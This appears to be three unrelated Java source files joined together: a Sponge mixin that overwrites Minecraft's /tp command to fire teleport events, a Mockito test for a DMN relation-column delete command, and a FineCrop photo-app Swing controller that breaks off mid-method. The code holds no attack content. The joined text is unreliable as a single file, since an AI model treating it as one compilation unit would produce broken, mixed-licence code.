 * This file is part of Sponge, licensed under the MIT License (MIT).
 *
 * Copyright (c) SpongePowered <https://www.spongepowered.org>
 * Copyright (c) contributors
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */
package org.spongepowered.common.mixin.core.command.server;

import com.flowpowered.math.vector.Vector3d;
import net.minecraft.command.CommandBase;
import net.minecraft.command.CommandException;
import net.minecraft.command.CommandTP;
import net.minecraft.command.ICommandSender;
import net.minecraft.command.WrongUsageException;
import net.minecraft.entity.Entity;
import net.minecraft.entity.EntityLivingBase;
import net.minecraft.entity.player.EntityPlayerMP;
import net.minecraft.network.play.server.SPacketPlayerPosLook;
import net.minecraft.server.MinecraftServer;
import net.minecraft.util.math.MathHelper;
import org.spongepowered.api.event.entity.MoveEntityEvent;
import org.spongepowered.asm.mixin.Mixin;
import org.spongepowered.asm.mixin.Overwrite;
import org.spongepowered.common.entity.EntityUtil;

import java.util.EnumSet;
import java.util.Set;

/**
 * Mixin that overwrites the vanilla {@code /tp} command so that every
 * teleport it performs first fires a Sponge {@link MoveEntityEvent.Teleport}
 * (via {@link EntityUtil#handleDisplaceEntityTeleportEvent}) and honours the
 * event's cancellation and transform.
 */
@Mixin(CommandTP.class)
public abstract class MixinCommandTP extends CommandBase {

    // This boolean is added in order to make minimal changes to 'execute'.
    // It is set to true if the events fired in 'teleportEntityToCoordinates' are not cancelled.
    // This allows us to prevent calling 'notifyCommandListener' if the event is cancelled.
    // NOTE(review): static mutable state — this flag is only meaningful when a
    // single command executes at a time on the server thread; 'execute' saves
    // and restores it to guard against re-entrance.
    private static boolean shouldNotifyCommandListener = false;

    /**
     * @author blood - May 31st, 2016
     * @author gabizou - May 31st, 2016 - Update to 1.9.4
     * @author Aaron1011 - August 15, 2016 - Update to 1.10.2
     * @reason to fix LVT errors with SpongeForge
     *
     * @param sender The command source
     * @param args The command arguments
     */
    @Override
    @Overwrite
    public void execute(MinecraftServer server, ICommandSender sender, String[] args) throws CommandException {
        if (args.length < 1) {
            throw new WrongUsageException("commands.tp.usage", new Object[0]);
        } else {
            int i = 0;
            Entity entity;

            // 2, 4 or 6 args means the first arg names the entity to move;
            // otherwise the sender itself is teleported.
            if (args.length != 2 && args.length != 4 && args.length != 6) {
                entity = getCommandSenderAsPlayer(sender);
            } else {
                entity = getEntity(server, sender, args[0]);
                i = 1;
            }

            if (args.length != 1 && args.length != 2) {
                // Coordinate form: /tp [target] <x> <y> <z> [yaw] [pitch]
                if (args.length < i + 3) {
                    throw new WrongUsageException("commands.tp.usage", new Object[0]);
                } else if (entity.world != null) {
                    // int j = 4096;
                    int lvt_6_2_ = i + 1;
                    CommandBase.CoordinateArg commandbase$coordinatearg = parseCoordinate(entity.posX, args[i], true);
                    // Y is range-limited to [-4096, 4096] by vanilla.
                    CommandBase.CoordinateArg commandbase$coordinatearg1 = parseCoordinate(entity.posY, args[lvt_6_2_++], -4096, 4096, false);
                    CommandBase.CoordinateArg commandbase$coordinatearg2 = parseCoordinate(entity.posZ, args[lvt_6_2_++], true);
                    // Yaw/pitch default to the entity's current rotation ("~") when omitted.
                    CommandBase.CoordinateArg commandbase$coordinatearg3 = parseCoordinate((double)entity.rotationYaw, args.length > lvt_6_2_ ? args[lvt_6_2_++] : "~", false);
                    CommandBase.CoordinateArg commandbase$coordinatearg4 = parseCoordinate((double)entity.rotationPitch, args.length > lvt_6_2_ ? args[lvt_6_2_] : "~", false);

                    // Sponge start - check shouldNotifyCommandListener before calling 'notifyCommandListener'

                    // Guard against any possible re-entrance
                    boolean shouldNotify = shouldNotifyCommandListener;

                    // Sets 'shouldNotifyCommandListener' to true only if the fired event was not cancelled.
                    teleportEntityToCoordinates(entity, commandbase$coordinatearg, commandbase$coordinatearg1, commandbase$coordinatearg2, commandbase$coordinatearg3, commandbase$coordinatearg4);

                    if (shouldNotifyCommandListener) {
                        notifyCommandListener(sender, this, "commands.tp.success.coordinates", new Object[] {entity.getName(), Double.valueOf(commandbase$coordinatearg.getResult()), Double.valueOf(commandbase$coordinatearg1.getResult()), Double.valueOf(commandbase$coordinatearg2.getResult())});
                    }

                    // Restore the saved value in case of nested command execution.
                    shouldNotifyCommandListener = shouldNotify;
                    // Sponge end
                }
            } else {
                // Entity-to-entity form: /tp [target] <destination entity>
                Entity entity1 = getEntity(server, sender, args[args.length - 1]);

                if (entity1.world != entity.world) {
                    throw new CommandException("commands.tp.notSameDimension", new Object[0]);
                } else {
                    entity.dismountRidingEntity();

                    if (entity instanceof EntityPlayerMP) {
                        // Sponge start - fire the teleport event and use its (possibly modified) transform
                        EntityPlayerMP player = (EntityPlayerMP) entity;
                        MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(entity, entity1.posX, entity1.posY, entity1.posZ, entity1.rotationYaw, entity1.rotationPitch);
                        if (event.isCancelled()) {
                            return;
                        }

                        Vector3d position = event.getToTransform().getPosition();
                        player.connection.setPlayerLocation(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch());
                        // Sponge end
                    } else {
                        // Sponge Start - Events
                        MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(entity, entity1.posX, entity1.posY, entity1.posZ, entity1.rotationYaw, entity1.rotationPitch);
                        if (event.isCancelled()) {
                            return;
                        }

                        Vector3d position = event.getToTransform().getPosition();
                        entity.setLocationAndAngles(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch());
                        // Sponge End
                    }

                    notifyCommandListener(sender, this, "commands.tp.success", new Object[] {entity.getName(), entity1.getName()});
                }
            }
        }
    }

    /**
     * @author Aaron1011 - August 15, 2016
     * @reason Muliple modification points are needed, so an overwrite is easier
     */
    @Overwrite
    private static void teleportEntityToCoordinates(Entity p_189863_0_, CommandBase.CoordinateArg p_189863_1_, CommandBase.CoordinateArg p_189863_2_, CommandBase.CoordinateArg p_189863_3_, CommandBase.CoordinateArg p_189863_4_, CommandBase.CoordinateArg p_189863_5_) {
        // p_189863_1_..3_ are x/y/z, p_189863_4_ is yaw, p_189863_5_ is pitch.
        if (p_189863_0_ instanceof EntityPlayerMP) {
            // Players receive a position packet; relative args are encoded as flags
            // so the client applies them as offsets.
            Set<SPacketPlayerPosLook.EnumFlags> set = EnumSet.<SPacketPlayerPosLook.EnumFlags>noneOf(SPacketPlayerPosLook.EnumFlags.class);

            if (p_189863_1_.isRelative()) {
                set.add(SPacketPlayerPosLook.EnumFlags.X);
            }

            if (p_189863_2_.isRelative()) {
                set.add(SPacketPlayerPosLook.EnumFlags.Y);
            }

            if (p_189863_3_.isRelative()) {
                set.add(SPacketPlayerPosLook.EnumFlags.Z);
            }

            if (p_189863_5_.isRelative()) {
                set.add(SPacketPlayerPosLook.EnumFlags.X_ROT);
            }

            if (p_189863_4_.isRelative()) {
                set.add(SPacketPlayerPosLook.EnumFlags.Y_ROT);
            }

            float f = (float)p_189863_4_.getAmount();

            if (!p_189863_4_.isRelative()) {
                f = MathHelper.wrapDegrees(f);
            }

            float f1 = (float)p_189863_5_.getAmount();

            if (!p_189863_5_.isRelative()) {
                f1 = MathHelper.wrapDegrees(f1);
            }

            // Sponge start - fire the teleport event before moving the player
            EntityPlayerMP player = (EntityPlayerMP) p_189863_0_;
            double x = p_189863_1_.getAmount();
            double y = p_189863_2_.getAmount();
            double z = p_189863_3_.getAmount();
            MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(player, x, y, z, f, f1);
            if (event.isCancelled()) {
                return;
            }

            p_189863_0_.dismountRidingEntity();
            Vector3d position = event.getToTransform().getPosition();
            ((EntityPlayerMP)p_189863_0_).connection.setPlayerLocation(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch(), set);
            p_189863_0_.setRotationYawHead((float) event.getToTransform().getYaw());
            // Sponge end
        } else {
            // Non-player entities are moved directly; rotations use the resolved
            // (absolute) results, with pitch clamped to [-90, 90].
            float f2 = (float)MathHelper.wrapDegrees(p_189863_4_.getResult());
            float f3 = (float)MathHelper.wrapDegrees(p_189863_5_.getResult());
            f3 = MathHelper.clamp(f3, -90.0F, 90.0F);

            // Sponge start - fire the teleport event before moving the entity
            double x = p_189863_1_.getResult();
            double y = p_189863_2_.getResult();
            double z = p_189863_3_.getResult();
            MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(p_189863_0_, x, y, z, f2, f3);
            if (event.isCancelled()) {
                return;
            }

            Vector3d position = event.getToTransform().getPosition();
            p_189863_0_.setLocationAndAngles(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch());
            p_189863_0_.setRotationYawHead((float) event.getToTransform().getYaw());
            // Sponge end
        }

        // Ground the entity unless it is elytra-flying.
        if (!(p_189863_0_ instanceof EntityLivingBase) || !((EntityLivingBase)p_189863_0_).isElytraFlying()) {
            p_189863_0_.motionY = 0.0D;
            p_189863_0_.onGround = true;
        }

        // Sponge start - set 'shouldNotifyCommandListener' to 'true' if we make it to the end of the method (the event wasn't cancelled)
        shouldNotifyCommandListener = true;
        // Sponge end
    }
}
/*
 * Copyright 2018 Red Hat, Inc. and/or its affiliates.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.kie.workbench.common.dmn.client.commands.expressions.types.relation;

import java.util.Optional;

import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.kie.workbench.common.dmn.api.definition.v1_1.InformationItem;
import org.kie.workbench.common.dmn.api.definition.v1_1.List;
import org.kie.workbench.common.dmn.api.definition.v1_1.LiteralExpression;
import org.kie.workbench.common.dmn.api.definition.v1_1.Relation;
import org.kie.workbench.common.dmn.client.editors.expressions.types.relation.RelationColumn;
import org.kie.workbench.common.dmn.client.editors.expressions.types.relation.RelationUIModelMapper;
import org.kie.workbench.common.dmn.client.widgets.grid.controls.list.ListSelectorView;
import org.kie.workbench.common.dmn.client.widgets.grid.model.DMNGridRow;
import org.kie.workbench.common.stunner.core.client.canvas.AbstractCanvasHandler;
import org.kie.workbench.common.stunner.core.client.command.CanvasCommandResultBuilder;
import org.kie.workbench.common.stunner.core.client.command.CanvasViolation;
import org.kie.workbench.common.stunner.core.command.Command;
import org.kie.workbench.common.stunner.core.graph.command.GraphCommandExecutionContext;
import org.kie.workbench.common.stunner.core.graph.command.GraphCommandResultBuilder;
import org.kie.workbench.common.stunner.core.rule.RuleManager;
import org.kie.workbench.common.stunner.core.rule.RuleViolation;
import org.mockito.Mock;
import org.mockito.runners.MockitoJUnitRunner;
import org.uberfire.ext.wires.core.grids.client.model.GridData;
import org.uberfire.ext.wires.core.grids.client.model.impl.BaseGridData;
import org.uberfire.ext.wires.core.grids.client.widget.grid.columns.RowNumberColumn;

import static org.junit.Assert.assertEquals;
import static org.mockito.Mockito.doReturn;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.reset;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.verify;

/**
 * Tests for {@code DeleteRelationColumnCommand}: both the graph-side command
 * (which mutates the DMN {@link Relation} model) and the canvas-side command
 * (which mutates the UI {@link GridData} model), including undo behaviour.
 */
@RunWith(MockitoJUnitRunner.class)
public class DeleteRelationColumnCommandTest {

    // Cell value used to verify that undo restores the deleted column's data.
    private static final String VALUE = "value";

    @Mock
    private RowNumberColumn uiRowNumberColumn;

    @Mock
    private RelationColumn uiModelColumn;

    @Mock
    private ListSelectorView.Presenter listSelector;

    @Mock
    private org.uberfire.mvp.Command canvasOperation;

    @Mock
    private AbstractCanvasHandler handler;

    @Mock
    private GraphCommandExecutionContext gce;

    @Mock
    private RuleManager ruleManager;

    private Relation relation;

    private InformationItem informationItem;

    private GridData uiModel;

    private RelationUIModelMapper uiModelMapper;

    private DeleteRelationColumnCommand command;

    @Before
    public void setup() {
        // One Relation column backed by a two-column UI model:
        // column 0 is the row-number column, column 1 the relation column.
        this.relation = new Relation();
        this.informationItem = new InformationItem();
        this.relation.getColumn().add(informationItem);
        this.uiModel = new BaseGridData();
        this.uiModel.appendColumn(uiRowNumberColumn);
        this.uiModel.appendColumn(uiModelColumn);

        doReturn(ruleManager).when(handler).getRuleManager();
        doReturn(0).when(uiRowNumberColumn).getIndex();
        doReturn(1).when(uiModelColumn).getIndex();

        this.uiModelMapper = new RelationUIModelMapper(() -> uiModel,
                                                       () -> Optional.of(relation),
                                                       listSelector);
    }

    // Builds the command under test (as a spy, so interactions can be verified)
    // targeting the given UI column index.
    private void makeCommand(final int uiColumnIndex) {
        this.command = spy(new DeleteRelationColumnCommand(relation,
                                                           uiModel,
                                                           uiColumnIndex,
                                                           uiModelMapper,
                                                           canvasOperation));
    }

    // Default: delete UI column 1 (the single relation column).
    private void makeCommand() {
        makeCommand(1);
    }

    @Test
    public void testGraphCommandAllow() {
        makeCommand();
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.allow(gce));
    }

    @Test
    public void testGraphCommandExecuteWithRows() {
        // Deleting the only column removes its cell from each row but keeps the rows.
        relation.getRow().add(new List());
        relation.getRow().get(0).getExpression().add(new LiteralExpression());
        makeCommand();
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.execute(gce));
        assertEquals(0,
                     relation.getColumn().size());
        assertEquals(1,
                     relation.getRow().size());
        assertEquals(0,
                     relation.getRow().get(0).getExpression().size());
    }

    @Test
    public void testGraphCommandExecuteDeleteMiddleWithRows() {
        // Three columns; deleting the middle one must keep the first and last
        // expressions of each row in order.
        uiModel.appendColumn(mock(RelationColumn.class));
        uiModel.appendColumn(mock(RelationColumn.class));
        relation.getColumn().add(new InformationItem());
        relation.getColumn().add(new InformationItem());
        relation.getRow().add(new List());
        final LiteralExpression firstExpression = new LiteralExpression();
        final LiteralExpression lastExpression = new LiteralExpression();
        relation.getRow().get(0).getExpression().add(firstExpression);
        relation.getRow().get(0).getExpression().add(new LiteralExpression());
        relation.getRow().get(0).getExpression().add(lastExpression);
        makeCommand(2);
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.execute(gce));
        assertEquals(2,
                     relation.getColumn().size());
        assertEquals(1,
                     relation.getRow().size());
        assertEquals(2,
                     relation.getRow().get(0).getExpression().size());
        assertEquals(firstExpression,
                     relation.getRow().get(0).getExpression().get(0));
        assertEquals(lastExpression,
                     relation.getRow().get(0).getExpression().get(1));
    }

    @Test
    public void testGraphCommandExecuteWithNoRows() {
        makeCommand();
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.execute(gce));
        assertEquals(0,
                     relation.getColumn().size());
        assertEquals(0,
                     relation.getRow().size());
    }

    @Test
    public void testGraphCommandUndoWithRows() {
        // Undo must restore both the column and the deleted cell content.
        relation.getRow().add(new List());
        final LiteralExpression literalExpression = new LiteralExpression();
        literalExpression.setText(VALUE);
        relation.getRow().get(0).getExpression().add(literalExpression);
        makeCommand();
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        //Delete column and then undo
        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.execute(gce));
        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.undo(gce));
        assertEquals(1,
                     relation.getColumn().size());
        assertEquals(1,
                     relation.getRow().size());
        assertEquals(1,
                     relation.getRow().get(0).getExpression().size());
        assertEquals(VALUE,
                     ((LiteralExpression) relation.getRow().get(0).getExpression().get(0)).getText());
    }

    @Test
    public void testGraphCommandUndoWithNoRows() {
        makeCommand();
        final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler);

        //Delete column and then undo
        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.execute(gce));
        assertEquals(GraphCommandResultBuilder.SUCCESS,
                     c.undo(gce));
        assertEquals(1,
                     relation.getColumn().size());
        assertEquals(0,
                     relation.getRow().size());
    }

    @Test
    public void testCanvasCommandAllow() {
        makeCommand();
        final Command<AbstractCanvasHandler, CanvasViolation> c = command.newCanvasCommand(handler);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     c.allow(handler));
    }

    @Test
    public void testCanvasCommandExecuteWithRows() {
        // Populate the UI model from the DMN model first, then delete the column.
        relation.getRow().add(new List());
        relation.getRow().get(0).getExpression().add(new LiteralExpression());
        uiModel.appendRow(new DMNGridRow());
        uiModelMapper.fromDMNModel(0, 0);
        uiModelMapper.fromDMNModel(0, 1);
        makeCommand();
        final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.execute(handler));
        // Only the row-number column remains; its cell still holds the row number.
        assertEquals(1,
                     uiModel.getColumnCount());
        assertEquals(uiRowNumberColumn,
                     uiModel.getColumns().get(0));
        assertEquals(1,
                     uiModel.getRowCount());
        assertEquals(1,
                     uiModel.getRows().get(0).getCells().size());
        assertEquals(1,
                     uiModel.getCell(0, 0).getValue().getValue());

        verify(command).updateParentInformation();

        verify(canvasOperation).execute();
    }

    @Test
    public void testCanvasCommandExecuteWithNoRows() {
        makeCommand();
        final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.execute(handler));
        assertEquals(1,
                     uiModel.getColumnCount());
        assertEquals(uiRowNumberColumn,
                     uiModel.getColumns().get(0));
        assertEquals(0,
                     uiModel.getRowCount());

        verify(command).updateParentInformation();

        verify(canvasOperation).execute();
    }

    @Test
    public void testCanvasCommandUndoWithRows() {
        relation.getRow().add(new List());
        final LiteralExpression literalExpression = new LiteralExpression();
        literalExpression.setText(VALUE);
        relation.getRow().get(0).getExpression().add(literalExpression);
        uiModel.appendRow(new DMNGridRow());
        uiModelMapper.fromDMNModel(0, 1);
        makeCommand();

        //Delete column and then undo
        final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.execute(handler));

        // reset so the verify calls below only see the undo's interactions.
        reset(command, canvasOperation);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.undo(handler));
        assertEquals(2,
                     uiModel.getColumnCount());
        assertEquals(uiRowNumberColumn,
                     uiModel.getColumns().get(0));
        assertEquals(uiModelColumn,
                     uiModel.getColumns().get(1));
        assertEquals(1,
                     uiModel.getRowCount());
        assertEquals(1,
                     uiModel.getRows().get(0).getCells().size());
        assertEquals(VALUE,
                     uiModel.getCell(0, 1).getValue().getValue());

        verify(command).updateParentInformation();

        verify(canvasOperation).execute();
    }

    @Test
    public void testCanvasCommandUndoWithNoRows() {
        makeCommand();

        //Delete column and then undo
        final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.execute(handler));

        // reset so the verify calls below only see the undo's interactions.
        reset(command, canvasOperation);

        assertEquals(CanvasCommandResultBuilder.SUCCESS,
                     cc.undo(handler));
        assertEquals(2,
                     uiModel.getColumnCount());
        assertEquals(uiRowNumberColumn,
                     uiModel.getColumns().get(0));
        assertEquals(uiModelColumn,
                     uiModel.getColumns().get(1));
        assertEquals(0,
                     uiModel.getRowCount());

        verify(command).updateParentInformation();

        verify(canvasOperation).execute();
    }
}
package org.crepi22.finecrop;

import java.awt.event.ActionEvent;
import java.awt.Desktop;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Stack;

import javax.swing.AbstractAction;
import javax.swing.Action;
import javax.swing.Box;
import javax.swing.ImageIcon;
import javax.swing.JFrame;
import javax.swing.JOptionPane;
import javax.swing.JToolBar;
import javax.swing.SwingUtilities;

/**
 * Controller for the behaviour of the application.
 *
 * <p>Drives a stack-based workflow: each pending operation on a photo file is a
 * {@link FileAction} pushed on {@link #todo}. {@link #doNext()} pops the next step,
 * shows it in the {@link PhotoView}, and the view calls back through the
 * {@link Continuation} interface ({@link #runFile}, {@link #runFiles}, {@link #cancel},
 * {@link #error}) with the generated result files. Each step keeps a link to the step
 * that produced its input file ({@code history}), which is what makes cancel/undo work.
 *
 * @author pierre
 */
public class Controller implements Continuation {

    /**
     * One pending unit of work: a file, the action to apply to it, and a link to the
     * step that produced this file (null for an original, user-selected file).
     */
    static class FileAction {
        File file;
        FCAction action;
        // The step whose output this file is; forms a linked chain back to the origin.
        FileAction history;

        FileAction(File file, FCAction action, FileAction history) {
            this.file = file;
            this.action = action;
            this.history = history;
        }

        // NOTE(review): equals() ignores 'history' and hashCode() is not overridden,
        // so these objects must not be used as hash keys — they are only compared
        // directly and stored in a Stack here.
        public boolean equals(Object o) {
            if (!(o instanceof FileAction))
                return false;
            FileAction other = (FileAction) o;
            return file.equals(other.file) && action.equals(other.action);
        }

        /** Number of steps between this action and the original file (chain length). */
        public int historySize() {
            FileAction cursor = this;
            int size = 0;
            while (cursor.history != null) {
                size++;
                cursor = cursor.history;
            }
            return size;
        }

        /** Walks the history chain back to the original, user-selected file. */
        public File origin() {
            FileAction cursor = this;
            while (cursor.history != null)
                cursor = cursor.history;
            return cursor.file;
        }
    }

    /**
     * Toolbar action that rotates the current step's photo by a fixed angle,
     * without going through the interactive rotation view.
     */
    class QuickRotation extends AbstractAction {
        private static final long serialVersionUID = 1L;
        private final int angle;

        QuickRotation(String name, String path, int angle) {
            super(name, makeIcon(path));
            this.angle = angle;
        }

        @Override
        public void actionPerformed(ActionEvent arg0) {
            if (step == null)
                return;
            // Consume the current step: its action becomes the continuation for the
            // rotated result, and 'step' rolls back to the producing step.
            File file = step.file;
            currentAction = step.action;
            step = step.history;
            try {
                // Rotate runs asynchronously and reports back through this Continuation.
                new Rotate(Controller.this, new Photo(file), angle).start();
            } catch (IOException e) {
                Controller.this.error(Messages.getString("Controller.image_error") + file + ": " + e.getMessage()); //$NON-NLS-1$ //$NON-NLS-2$
            }
        }
    }

    /** Opens the current step's photo in the interactive rotation view. */
    final private Action rotateAction = new AbstractAction(Messages.getString("Controller.Rotation_title"), makeIcon("rotate.png")) { //$NON-NLS-1$ //$NON-NLS-2$
        private static final long serialVersionUID = 1L;

        @Override
        public void actionPerformed(ActionEvent arg0) {
            if (step == null)
                return;
            File file = step.file;
            currentAction = step.action;
            step = step.history;
            photoView.setPhoto(file, FCAction.ROTATE);
        }
    };

    /** Opens the current step's photo in the single-crop view. */
    final private Action cropAction = new AbstractAction(Messages.getString("Controller.Crop_title"), makeIcon("crop.png")) { //$NON-NLS-1$ //$NON-NLS-2$
        private static final long serialVersionUID = 1L;

        @Override
        public void actionPerformed(ActionEvent arg0) {
            if (step == null)
                return;
            File file = step.file;
            currentAction = step.action;
            step = step.history;
            photoView.setPhoto(file, FCAction.CROP);
        }
    };

    /** Opens the current step's photo in the multi-crop view. */
    final private Action multiAction = new AbstractAction(Messages.getString("Controller.Multiple_title"), makeIcon("multi.png")) { //$NON-NLS-1$ //$NON-NLS-2$
        private static final long serialVersionUID = 1L;

        @Override
        public void actionPerformed(ActionEvent arg0) {
            if (step == null)
                return;
            File file = step.file;
            currentAction = step.action;
            step = step.history;
            photoView.setPhoto(file, FCAction.MULTICROP);
        }
    };

    /** Shows the configuration window. */
    final private Action settings = new AbstractAction(Messages.getString("Controller.Settings_Title"), makeIcon("settings.png")) { //$NON-NLS-1$ //$NON-NLS-2$
        private static final long serialVersionUID = 1L;

        @Override
        public void actionPerformed(ActionEvent arg0) {
            JFrame options = new ConfigPanel();
            options.setVisible(true);
        }
    };

    /** Opens the project wiki in the system browser, if a desktop is available. */
    final private Action helpAction = new AbstractAction(Messages.getString("Controller.Help_Title"), makeIcon("help.png")) { //$NON-NLS-1$ //$NON-NLS-2$
        private static final long serialVersionUID = 1L;

        @Override
        public void actionPerformed(ActionEvent arg0) {
            String url = "https://github.com/crepi22/finecrop/wiki";
            try {
                if (Desktop.isDesktopSupported()) {
                    Desktop.getDesktop().browse(new URI(url));
                }
            } catch (IOException | URISyntaxException e) {
                // Best-effort: failing to open the browser is silently ignored.
            }
        }
    };

    final private Action rot90 = new QuickRotation(Messages.getString("Controller.Rot_Left_Title"), "left.png", 90); //$NON-NLS-1$ //$NON-NLS-2$
    final private Action rot270 = new QuickRotation(Messages.getString("Controller.Rot_Right_Title"), "right.png", 270); //$NON-NLS-1$ //$NON-NLS-2$
    final private Action rot180 = new QuickRotation(Messages.getString("Controller.Upside_Down_Title"), "upsideDown.png", 180); //$NON-NLS-1$ //$NON-NLS-2$

    final private PhotoView photoView;
    final private StateLine stateLine;
    // Every intermediate file ever produced; all are deleted when the workflow ends.
    final private List<File> allGenerated = new ArrayList<File>();
    final private JFrame frame;
    // Pending steps, processed LIFO by doNext().
    private Stack<FileAction> todo = new Stack<FileAction>();
    // Action to attach to the files the view reports next; null means the
    // reported files are final results.
    private FCAction currentAction;
    // The step currently being shown/processed; null before the first doNext().
    private FileAction step = null;

    /**
     * States of the system.
     */
    final public static String STATES[] = {
            Messages.getString("Controller.Rotation_title"), //$NON-NLS-1$
            Messages.getString("Controller.Crop_title"), //$NON-NLS-1$
            Messages.getString("Controller.Multiple_title"), //$NON-NLS-1$
            Messages.getString("Controller.Confirm_title") //$NON-NLS-1$
    };

    /**
     * What is written on the tooltips
     */
    final public static String[] TOOLTIPS = {
            Messages.getString("Controller.Rotation_tooltip"), //$NON-NLS-1$
            Messages.getString("Controller.Crop_tooltip"), //$NON-NLS-1$
            Messages.getString("Controller.Multiple_tooltip"), //$NON-NLS-1$
            Messages.getString("Controller.Confirm_tooltip") //$NON-NLS-1$
    };

    // Glass pane used as a "busy" overlay; toggled by showEffect().
    private TranslucentGlassPane glassPane;
    // Final results per original file: origin -> list of generated output files.
    private Map<File, List<File>> finalResults = new HashMap<File, List<File>>();

    /**
     * Wires the controller to the UI: populates the toolbar, registers itself as
     * the view's continuation and installs the busy-overlay glass pane.
     */
    Controller(JFrame frame, PhotoView view, StateLine stateLine, JToolBar toolbar) {
        this.frame = frame;
        this.photoView = view;
        this.stateLine = stateLine;
        toolbar.add(settings);
        toolbar.add(rotateAction);
        toolbar.add(cropAction);
        toolbar.add(multiAction);
        toolbar.add(rot90);
        toolbar.add(rot270);
        toolbar.add(rot180);
        toolbar.add(Box.createVerticalGlue());
        toolbar.add(helpAction);
        view.setContinuation(this);
        glassPane = new TranslucentGlassPane();
        frame.setGlassPane(glassPane);
        glassPane.setEnabled(false);
        glassPane.setVisible(true);
    }

    /**
     * Toggles the busy overlay (and disables the photo view) on the EDT.
     * Safe to call from a worker thread; blocks until the EDT has applied it.
     *
     * @param b true to show the busy effect, false to hide it
     */
    public void showEffect(final boolean b) {
        try {
            SwingUtilities.invokeAndWait(new Runnable() {
                @Override
                public void run() {
                    photoView.setEnabled(!b);
                    glassPane.setEnabled(b);
                }
            });
        } catch (InterruptedException e) {
            // NOTE(review): interrupt status is swallowed here — the overlay state
            // may be left unchanged if the wait is interrupted.
        } catch (InvocationTargetException e) {
        }
    }

    /*
     * (non-Javadoc)
     * @see org.crepi22.finecrop.Continuation#runFile(java.io.File)
     */
    @Override
    public void runFile(File file) {
        // currentAction != null: the produced file still has a follow-up action to
        // run, so queue it. Otherwise it is a final result for its origin file.
        if (currentAction != null)
            todo.push(new FileAction(file, currentAction, step));
        else {
            File origin = step.origin();
            List<File> results = getResults(origin);
            results.add(file);
        }
        doNext();
    }

    /*
     * (non-Javadoc)
     * @see org.crepi22.finecrop.Continuation#runFiles(java.util.List)
     */
    @Override
    public void runFiles(List<File> files) {
        // All produced files are tracked so they can be cleaned up at the end.
        allGenerated.addAll(files);
        if (currentAction != null) {
            for (File file : files) {
                System.out.println(file);
                todo.push(new FileAction(file, currentAction, step));
            }
        } else {
            File origin = step.origin();
            List<File> results = getResults(origin);
            results.addAll(files);
        }
        doNext();
    }

    /**
     * Main entry point to perform a list of operations on a file.
     *
     * @param files the files
     * @param mode the mode the list of operations to perform. This can generate a tree of sub files.
     */
    public void perform(List<File> files, FCAction mode) {
